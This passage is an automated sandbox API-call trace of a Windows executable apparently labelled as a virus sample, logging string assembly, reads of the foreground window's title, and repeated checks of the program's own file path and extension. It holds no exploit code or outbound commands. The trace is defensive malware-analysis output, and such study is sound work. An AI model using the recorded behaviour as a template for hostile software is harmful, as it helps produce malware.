pvarResult=0x28f1c0) returned 0x0 [0178.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.774] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.775] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.775] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.775] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.775] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.776] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.782] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.783] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.783] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.783] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.784] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.784] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.784] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.785] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.785] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.785] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.786] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.786] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.786] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.787] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.787] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.788] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.788] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.788] GetForegroundWindow () returned 0x1011a [0178.788] GetLastError () returned 0x0 [0178.788] SysStringLen (param_1=" ") returned 0xff [0178.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.789] SysStringLen (param_1=" ") returned 0xff [0178.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.789] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0178.789] GetLastError () returned 0x0 [0178.789] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.789] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0178.790] SysStringLen (param_1="Fo") returned 0x2 [0178.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fo", cchWideChar=3, lpMultiByteStr=0x116863c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fo", lpUsedDefaultChar=0x0) returned 3 [0178.790] SetWindowTextA (hWnd=0x103c4, lpString="Fo") returned 1 [0178.790] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0178.790] GetFocus () returned 0x0 [0178.790] lstrlenA (lpString="Fo") returned 2 [0178.790] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116863c) returned 0x1 [0178.791] IsWindow (hWnd=0x103c4) returned 1 [0178.791] IsWindow (hWnd=0x103c4) returned 1 [0178.791] IsWindow (hWnd=0x103c4) returned 1 [0178.791] IsWindow (hWnd=0x103c4) returned 1 [0178.791] GetFocus () returned 0x0 [0178.796] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0178.796] GetFocus () returned 0x0 [0178.796] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0178.796] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0178.796] GetFocus () returned 0x0 [0178.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fo", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0178.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fo", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=3 | out: lpWideCharStr="Fo") returned 3 [0178.797] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.797] VarBstrCmp (bstrLeft="Fo", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.797] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0178.797] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0178.797] GetTickCount () returned 0x1d19710 [0178.798] IsWindowVisible (hWnd=0x103b8) returned 0 [0178.798] Sleep (dwMilliseconds=0x0) [0178.800] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0178.801] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0178.802] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0178.802] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0178.803] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0178.803] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.803] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0178.803] GetTickCount () returned 0x1d19710 [0178.803] GetTickCount () returned 0x1d19710 [0178.804] GetTickCount () returned 0x1d19710 [0178.804] GetTickCount () returned 0x1d19710 [0178.804] IsWindowVisible (hWnd=0x103b8) returned 0 [0178.804] Sleep (dwMilliseconds=0x0) [0178.805] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0178.805] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0178.806] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0178.807] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0178.807] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0178.807] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.811] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0178.811] GetTickCount () returned 0x1d1971f [0178.811] GetTickCount () returned 0x1d1971f [0178.811] GetTickCount () returned 0x1d1971f [0178.811] GetTickCount () returned 0x1d1971f [0178.812] IsWindowVisible (hWnd=0x103b8) returned 0 [0178.812] Sleep (dwMilliseconds=0x0) [0178.813] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0178.813] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0178.815] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0178.815] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0178.815] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0178.815] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.815] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0178.816] GetTickCount () returned 0x1d1971f [0178.816] GetTickCount () returned 0x1d1971f [0178.816] GetTickCount () returned 0x1d1971f [0178.816] GetTickCount () returned 0x1d1971f [0178.816] IsWindowVisible (hWnd=0x103b8) returned 0 [0178.816] Sleep (dwMilliseconds=0x0) [0178.864] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0178.865] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0178.866] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0178.867] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, 